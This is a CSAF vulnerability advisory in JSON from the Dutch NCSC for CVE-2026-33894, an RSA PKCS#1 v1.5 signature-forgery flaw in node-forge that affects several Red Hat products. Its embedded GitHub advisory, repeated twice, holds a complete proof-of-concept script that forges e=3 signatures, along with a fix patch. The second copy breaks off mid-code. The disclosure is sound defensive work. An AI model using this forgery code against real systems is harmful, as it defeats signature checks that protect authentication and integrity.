{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33894", "tracking": { "current_release_date": "2026-03-31T14:43:16.503839Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33894", "initial_release_date": "2026-03-26T22:54:47.260068Z", "revision_history": [ { "date": "2026-03-26T22:54:47.260068Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)." }, { "date": "2026-03-26T22:54:50.708949Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-27T00:21:03.916334Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (5).| CWES updated (1)." }, { "date": "2026-03-27T00:21:05.856904Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-27T07:34:56.686996Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:38:06.270273Z", "number": "6", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-28T07:38:08.849290Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:39:04.245578Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (4).| CWES updated (1)." }, { "date": "2026-03-28T07:39:14.786334Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:40:46.732806Z", "number": "10", "summary": "References created (1)." }, { "date": "2026-03-28T12:28:14.497458Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (36).| Product Identifiers created (13).| Product Remediations created (36).| References created (6).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-28T12:28:20.179510Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-29T00:38:39.207334Z", "number": "13", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-31T14:39:13.538408Z", "number": "14", "summary": "Unknown change." } ], "status": "interim", "version": "14" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/4", "product": { "name": "vers:rpm/4", "product_id": "CSAFPID-2552001", "product_identification_helper": { "cpe": "cpe:/a:redhat:cryostat:4" } } } ], "category": "product_name", "name": "Cryostat 4" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/5", "product": { "name": "vers:rpm/5", "product_id": "CSAFPID-1459353", "product_identification_helper": { "cpe": "cpe:/a:redhat:logging:5" } } } ], "category": "product_name", "name": "Logging Subsystem for Red Hat OpenShift" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-1508257", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/1", "product": { "name": "vers:rpm/1", "product_id": "CSAFPID-5940623", "product_identification_helper": { "cpe": "cpe:/a:redhat:podman_desktop:1" } } } ], "category": "product_name", "name": "Red Hat Build of Podman Desktop" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/8", "product": { "name": "vers:rpm/8", "product_id": "CSAFPID-1439292", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_data_grid:8" } } } ], "category": "product_name", "name": "Red Hat Data Grid 8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/10", "product": { "name": "vers:rpm/10", "product_id": "CSAFPID-2858634", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:10" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 10" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/8", "product": { "name": "vers:rpm/8", "product_id": "CSAFPID-1439317", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:8" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/9", "product": { "name": "vers:rpm/9", "product_id": "CSAFPID-1439319", "product_identification_helper": { "cpe": "cpe:/a:redhat:enterprise_linux:9" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/7", "product": { "name": "vers:rpm/7", "product_id": "CSAFPID-1439294", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_fuse:7" } } } ], "category": "product_name", "name": "Red Hat Fuse 7" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/7", "product": { "name": "vers:rpm/7", "product_id": "CSAFPID-1439306", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7" } } } ], "category": "product_name", "name": "Red Hat Process Automation 7" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3", "product": { "name": "vers:rpm/3", "product_id": "CSAFPID-1441200", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3" } } } ], "category": "product_name", "name": "Red Hat Quay 3" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/4", "product": { "name": "vers:rpm/4", "product_id": "CSAFPID-2467441", "product_identification_helper": { "cpe": "cpe:/a:redhat:apache_camel_hawtio:4" } } } ], "category": "product_name", "name": "Red Hat build of Apache Camel - HawtIO 4" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-2467443", "product_identification_helper": { "cpe": "cpe:/a:redhat:service_registry:2" } } } ], "category": "product_name", "name": "Red Hat build of Apicurio Registry 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1837472" } } ], "category": "product_name", "name": "automation-eda-controller" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1837473" } } ], "category": "product_name", "name": "automation-gateway" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222698" } } ], "category": "product_name", "name": "automation-platform-ui" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5187689" } } ], "category": "product_name", "name": "elasticsearch-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2914696" } } ], "category": "product_name", "name": "elasticsearch-proxy-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2914697" } } ], "category": "product_name", "name": "elasticsearch-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2855724" } } ], "category": "product_name", "name": "elasticsearch6-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1459355" } } ], "category": "product_name", "name": "kibana6-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2855725" } } ], "category": "product_name", "name": "logging-curator5-rhel9" } ], "category": "product_family", "name": "Logging Subsystem for Red Hat OpenShift" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2868420" } } ], "category": "product_name", "name": "grafana" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 10" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1496261" } } ], "category": "product_name", "name": "grafana" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2109953" } } ], "category": "product_name", "name": "pcs" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 9" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467444" } } ], "category": "product_name", "name": "io.apicurio-apicurio-registry" } ], "category": "product_family", "name": "Red Hat build of Apicurio Registry 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467448" } } ], "category": "product_name", "name": "io.apicurio-apicurito" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1771999" } } ], "category": "product_name", "name": "io.syndesis-syndesis-parent" } ], "category": "product_family", "name": "Red Hat Fuse 7" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2698055" } } ], "category": "product_name", "name": "io.cryostat-cryostat" } ], "category": "product_family", "name": "Cryostat 4" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467442" } } ], "category": "product_name", "name": "io.hawt-project" } ], "category": "product_family", "name": "Red Hat build of Apache Camel - HawtIO 4" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467445" } } ], "category": "product_name", "name": "org.infinispan-infinispan-console" } ], "category": "product_family", "name": "Red Hat Data Grid 8" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2698057" } } ], "category": "product_name", "name": "org.uberfire-uberfire-parent" } ], "category": "product_family", "name": "Red Hat Process Automation 7" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2109952" } } ], "category": "product_name", "name": "pcs" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 8" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5940626" } } ], "category": "product_name", "name": "podman-desktop-macos-1" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5940629" } } ], "category": "product_name", "name": "podman-desktop-windows-1" } ], "category": "product_family", "name": "Red Hat Build of Podman Desktop" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1455906" } } ], "category": "product_name", "name": "quay-rhel8" } ], "category": "product_family", "name": "Red Hat Quay 3" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<1.4.0", "product": { "name": "vers:unknown/<1.4.0", "product_id": "CSAFPID-5956281" } } ], "category": "product_name", "name": "Forge" } ], "category": "vendor", "name": "Digital Bazaar" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0|<1.4.0", "product": { "name": "vers:unknown/>=0|<1.4.0", "product_id": "CSAFPID-5920253" } } ], "category": "product_name", "name": "node-forge" } ], "category": "vendor", "name": "digitalbazaar" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33894", "cwe": { "id": "CWE-347", "name": "Improper Verification of Cryptographic Signature" }, "notes": [ { "category": "description", "text": "## Summary\nRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling [Bleichenbacher style forgery](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/). This issue is similar to [CVE-2022-24771](https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765), but adds bytes in an addition field within the ASN structure, rather than outside of it. \n\nAdditionally, forge does not validate that signatures include a minimum of 8 bytes of padding as [defined by the specification](https://datatracker.ietf.org/doc/html/rfc2313#section-8), providing attackers additional space to construct Bleichenbacher forgeries. \n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and recent prior versions.\n\n**Configuration assumptions:**\n- Invoke key.verify with defaults (default `scheme` uses RSASSA-PKCS1-v1_5).\n- `_parseAllDigestBytes: true` (default setting).\n\n## Root Cause\n\nIn `lib/rsa.js`, `key.verify(...)`, forge decrypts the signature block, decodes PKCS#1 v1.5 padding (`_decodePkcs1_v1_5`), parses ASN.1, and compares `capture.digest` to the provided digest.\n\nTwo issues are present with this logic:\n\n1. Strict DER byte-consumption (`_parseAllDigestBytes`) only guarantees all bytes are parsed, not that the parsed structure is the canonical minimal DigestInfo shape expected by RFC 8017 verification semantics. A forged EM with attacker-controlled additional ASN.1 content inside the parsed container can still pass forge verification while OpenSSL rejects it.\n2. `_decodePkcs1_v1_5` comments mention that PS < 8 bytes should be rejected, but does not implement this logic.\n\n## Reproduction Steps\n1. Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n4. Place and run the PoC script (`repro_min.js`) with `node repro_min.js` in the same level as the `forge` folder.\n5. The script generates a fresh RSA keypair (`4096` bits, `e=3`), creates a normal control signature, then computes a forged candidate using cube-root interval construction.\n6. The script verifies both signatures with:\n - forge verify (`_parseAllDigestBytes: true`), and\n - Node/OpenSSL verify (`crypto.verify` with `RSA_PKCS1_PADDING`).\n7. Confirm output includes:\n - `control-forge-strict: true`\n - `control-node: true`\n - `forgery (forge library, strict): true`\n - `forgery (node/OpenSSL): false`\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged signature in one run.\n- Uses strict forge parsing mode explicitly (`_parseAllDigestBytes: true`, also forge default).\n- Uses Node/OpenSSL as an differential verification baseline.\n- Observed output on tested commit:\n\n```text\ncontrol-forge-strict: true\ncontrol-node: true\nforgery (forge library, strict): true\nforgery (node/OpenSSL): false\n```\n\n
repro_min.js\n\n```javascript\n#!/usr/bin/env node\n'use strict';\n\nconst crypto = require('crypto');\nconst forge = require('./forge/lib/index');\n\n// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:\n// SEQUENCE {\n// SEQUENCE { OID sha256, NULL },\n// OCTET STRING <32-byte digest>\n// }\n// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20\nconst DIGESTINFO_SHA256_PREFIX = Buffer.from(\n '300d060960864801650304020105000420',\n 'hex'\n);\n\nconst toBig = b => BigInt('0x' + (b.toString('hex') || '0'));\nfunction toBuf(n, len) {\n let h = n.toString(16);\n if (h.length % 2) h = '0' + h;\n const b = Buffer.from(h, 'hex');\n return b.length < len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;\n}\nfunction cbrtFloor(n) {\n let lo = 0n;\n let hi = 1n;\n while (hi * hi * hi <= n) hi <<= 1n;\n while (lo + 1n < hi) {\n const mid = (lo + hi) >> 1n;\n if (mid * mid * mid <= n) lo = mid;\n else hi = mid;\n }\n return lo;\n}\nconst cbrtCeil = n => {\n const f = cbrtFloor(n);\n return f * f * f === n ? f : f + 1n;\n};\nfunction derLen(len) {\n if (len < 0x80) return Buffer.from([len]);\n if (len <= 0xff) return Buffer.from([0x81, len]);\n return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);\n}\n\nfunction forgeStrictVerify(publicPem, msg, sig) {\n const key = forge.pki.publicKeyFromPem(publicPem);\n const md = forge.md.sha256.create();\n md.update(msg.toString('utf8'), 'utf8');\n try {\n // verify(digestBytes, signatureBytes, scheme, options):\n // - digestBytes: raw SHA-256 digest bytes for `msg`\n // - signatureBytes: binary-string representation of the candidate signature\n // - scheme: undefined => default RSASSA-PKCS1-v1_5\n // - options._parseAllDigestBytes: require DER parser to consume all bytes\n // (this is forge's default for verify; set explicitly here for clarity)\n return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };\n } catch (err) {\n return { ok: false, err: err.message };\n }\n}\n\nfunction main() {\n const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {\n modulusLength: 4096,\n publicExponent: 3,\n privateKeyEncoding: { type: 'pkcs1', format: 'pem' },\n publicKeyEncoding: { type: 'pkcs1', format: 'pem' }\n });\n\n const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });\n const nBytes = Buffer.from(jwk.n, 'base64url');\n const n = toBig(nBytes);\n const e = toBig(Buffer.from(jwk.e, 'base64url'));\n if (e !== 3n) throw new Error('expected e=3');\n\n const msg = Buffer.from('forged-message-0', 'utf8');\n const digest = crypto.createHash('sha256').update(msg).digest();\n const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);\n\n // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.\n const k = nBytes.length;\n // ffCount can be set to any value at or below 111 and produce a valid signature.\n // ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.\n // However, current versions of node forge do not check for this.\n // Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.\n const ffCount = 0; \n // `garbageLen` affects DER length field sizes, which in turn affect how\n // many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.\n // A small cap (8) is enough here: DER length-size transitions are discrete\n // and few (<128, <=255, <=65535, ...), so this stabilizes quickly.\n let garbageLen = 0;\n for (let i = 0; i < 8; i += 1) {\n const gLenEnc = derLen(garbageLen).length;\n const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;\n const seqLenEnc = derLen(seqLen).length;\n const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;\n const next = k - fixed;\n if (next === garbageLen) break;\n garbageLen = next;\n }\n const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;\n const prefix = Buffer.concat([\n Buffer.from([0x00, 0x01]),\n Buffer.alloc(ffCount, 0xff),\n Buffer.from([0x00]),\n Buffer.from([0x30]), derLen(seqLen),\n algAndDigest,\n Buffer.from([0x04]), derLen(garbageLen)\n ]);\n\n // Build the numeric interval of all EM values that start with `prefix`:\n // - `low` = prefix || 00..00\n // - `high` = one past (prefix || ff..ff)\n // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.\n const suffixLen = k - prefix.length;\n const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));\n const high = low + (1n << BigInt(8 * suffixLen));\n const s = cbrtCeil(low);\n if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');\n\n const sig = toBuf(s, k);\n\n const controlMsg = Buffer.from('control-message', 'utf8');\n const controlSig = crypto.sign('sha256', controlMsg, {\n key: privateKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n });\n\n // forge verification calls (library under test)\n const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);\n const forgedForge = forgeStrictVerify(publicKey, msg, sig);\n\n // Node.js verification calls (OpenSSL-backed reference behavior)\n const controlNode = crypto.verify('sha256', controlMsg, {\n key: publicKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n }, controlSig);\n const forgedNode = crypto.verify('sha256', msg, {\n key: publicKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n }, sig);\n\n console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');\n console.log('control-node:', controlNode);\n console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');\n console.log('forgery (node/OpenSSL):', forgedNode);\n}\n\nmain();\n```\n
\n\n## Suggested Patch\n- Enforce PKCS#1 v1.5 BT=0x01 minimum padding length (`PS >= 8`) in `_decodePkcs1_v1_5` before accepting the block.\n- Update the RSASSA-PKCS1-v1_5 verifier to require canonical DigestInfo structure only (no extra attacker-controlled ASN.1 content beyond expected fields).\n\nHere is a Forge-tested patch to resolve the issue, though it should be verified for consumer projects:\n\n```diff\nindex b207a63..ec8a9c1 100644\n--- a/lib/rsa.js\n+++ b/lib/rsa.js\n@@ -1171,6 +1171,14 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {\n error.errors = errors;\n throw error;\n }\n+\n+ if(obj.value.length != 2) {\n+ var error = new Error(\n+ 'DigestInfo ASN.1 object must contain exactly 2 fields for ' +\n+ 'a valid RSASSA-PKCS1-v1_5 package.');\n+ error.errors = errors;\n+ throw error;\n+ }\n // check hash algorithm identifier\n // see PKCS1-v1-5DigestAlgorithms in RFC 8017\n // FIXME: add support to validator for strict value choices\n@@ -1673,6 +1681,10 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {\n }\n ++padNum;\n }\n+\n+ if (padNum < 8) {\n+ throw new Error('Encryption block is invalid.');\n+ }\n } else if(bt === 0x02) {\n // look for 0x00 byte\n padNum = 0;\n```\n## Resources\n- RFC 2313 (PKCS v1.5): https://datatracker.ietf.org/doc/html/rfc2313#section-8\n - > This limitation guarantees that the length of the padding string PS is at least eight octets, which is a security condition. \n- RFC 8017: https://www.rfc-editor.org/rfc/rfc8017.html\n- `lib/rsa.js` `key.verify(...)` at lines ~1139-1223.\n- `lib/rsa.js` `_decodePkcs1_v1_5(...)` at lines ~1632-1695.\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.", "title": "github - https://api.github.com/advisories/GHSA-ppp5-5v6c-4jwp" }, { "category": "description", "text": "## Summary\nRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling [Bleichenbacher style forgery](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/). This issue is similar to [CVE-2022-24771](https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765), but adds bytes in an addition field within the ASN structure, rather than outside of it. \n\nAdditionally, forge does not validate that signatures include a minimum of 8 bytes of padding as [defined by the specification](https://datatracker.ietf.org/doc/html/rfc2313#section-8), providing attackers additional space to construct Bleichenbacher forgeries. \n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and recent prior versions.\n\n**Configuration assumptions:**\n- Invoke key.verify with defaults (default `scheme` uses RSASSA-PKCS1-v1_5).\n- `_parseAllDigestBytes: true` (default setting).\n\n## Root Cause\n\nIn `lib/rsa.js`, `key.verify(...)`, forge decrypts the signature block, decodes PKCS#1 v1.5 padding (`_decodePkcs1_v1_5`), parses ASN.1, and compares `capture.digest` to the provided digest.\n\nTwo issues are present with this logic:\n\n1. Strict DER byte-consumption (`_parseAllDigestBytes`) only guarantees all bytes are parsed, not that the parsed structure is the canonical minimal DigestInfo shape expected by RFC 8017 verification semantics. A forged EM with attacker-controlled additional ASN.1 content inside the parsed container can still pass forge verification while OpenSSL rejects it.\n2. `_decodePkcs1_v1_5` comments mention that PS < 8 bytes should be rejected, but does not implement this logic.\n\n## Reproduction Steps\n1. Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n4. Place and run the PoC script (`repro_min.js`) with `node repro_min.js` in the same level as the `forge` folder.\n5. The script generates a fresh RSA keypair (`4096` bits, `e=3`), creates a normal control signature, then computes a forged candidate using cube-root interval construction.\n6. The script verifies both signatures with:\n - forge verify (`_parseAllDigestBytes: true`), and\n - Node/OpenSSL verify (`crypto.verify` with `RSA_PKCS1_PADDING`).\n7. Confirm output includes:\n - `control-forge-strict: true`\n - `control-node: true`\n - `forgery (forge library, strict): true`\n - `forgery (node/OpenSSL): false`\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged signature in one run.\n- Uses strict forge parsing mode explicitly (`_parseAllDigestBytes: true`, also forge default).\n- Uses Node/OpenSSL as an differential verification baseline.\n- Observed output on tested commit:\n\n```text\ncontrol-forge-strict: true\ncontrol-node: true\nforgery (forge library, strict): true\nforgery (node/OpenSSL): false\n```\n\n
repro_min.js\n\n```javascript\n#!/usr/bin/env node\n'use strict';\n\nconst crypto = require('crypto');\nconst forge = require('./forge/lib/index');\n\n// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:\n// SEQUENCE {\n// SEQUENCE { OID sha256, NULL },\n// OCTET STRING <32-byte digest>\n// }\n// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20\nconst DIGESTINFO_SHA256_PREFIX = Buffer.from(\n '300d060960864801650304020105000420',\n 'hex'\n);\n\nconst toBig = b => BigInt('0x' + (b.toString('hex') || '0'));\nfunction toBuf(n, len) {\n let h = n.toString(16);\n if (h.length % 2) h = '0' + h;\n const b = Buffer.from(h, 'hex');\n return b.length < len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;\n}\nfunction cbrtFloor(n) {\n let lo = 0n;\n let hi = 1n;\n while (hi * hi * hi <= n) hi <<= 1n;\n while (lo + 1n < hi) {\n const mid = (lo + hi) >> 1n;\n if (mid * mid * mid <= n) lo = mid;\n else hi = mid;\n }\n return lo;\n}\nconst cbrtCeil = n => {\n const f = cbrtFloor(n);\n return f * f * f === n ? f : f + 1n;\n};\nfunction derLen(len) {\n if (len < 0x80) return Buffer.from([len]);\n if (len <= 0xff) return Buffer.from([0x81, len]);\n return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);\n}\n\nfunction forgeStrictVerify(publicPem, msg, sig) {\n const key = forge.pki.publicKeyFromPem(publicPem);\n const md = forge.md.sha256.create();\n md.update(msg.toString('utf8'), 'utf8');\n try {\n // verify(digestBytes, signatureBytes, scheme, options):\n // - digestBytes: raw SHA-256 digest bytes for `msg`\n // - signatureBytes: binary-string representation of the candidate signature\n // - scheme: undefined => default RSASSA-PKCS1-v1_5\n // - options._parseAllDigestBytes: require DER parser to consume all bytes\n // (this is forge's default for verify; set explicitly here for clarity)\n return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };\n } catch (err) {\n return { ok: false, err: err.message };\n }\n}\n\nfunction main() {\n const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {\n modulusLength: 4096,\n publicExponent: 3,\n privateKeyEncoding: { type: 'pkcs1', format: 'pem' },\n publicKeyEncoding: { type: 'pkcs1', format: 'pem' }\n });\n\n const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });\n const nBytes = Buffer.from(jwk.n, 'base64url');\n const n = toBig(nBytes);\n const e = toBig(Buffer.from(jwk.e, 'base64url'));\n if (e !== 3n) throw new Error('expected e=3');\n\n const msg = Buffer.from('forged-message-0', 'utf8');\n const digest = crypto.createHash('sha256').update(msg).digest();\n const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);\n\n // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.\n const k = nBytes.length;\n // ffCount can be set to any value at or below 111 and produce a valid signature.\n // ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.\n // However, current versions of node forge do not check for this.\n // Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.\n const ffCount = 0; \n // `garbageLen` affects DER length field sizes, which in turn affect how\n // many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.\n // A small cap (8) is enough here: DER length-size transitions are discrete\n // and few (<128, <=255, <=65535, ...), so this stabilizes quickly.\n let garbageLen = 0;\n for (let i = 0; i < 8; i += 1) {\n const gLenEnc = derLen(garbageLen).length;\n const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;\n const seqLenEnc = derLen(seqLen).length;\n const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;\n const next = k - fixed;\n if (next === garbageLen) break;\n garbageLen = next;\n }\n const seqLen = algAndDigest.length + 1 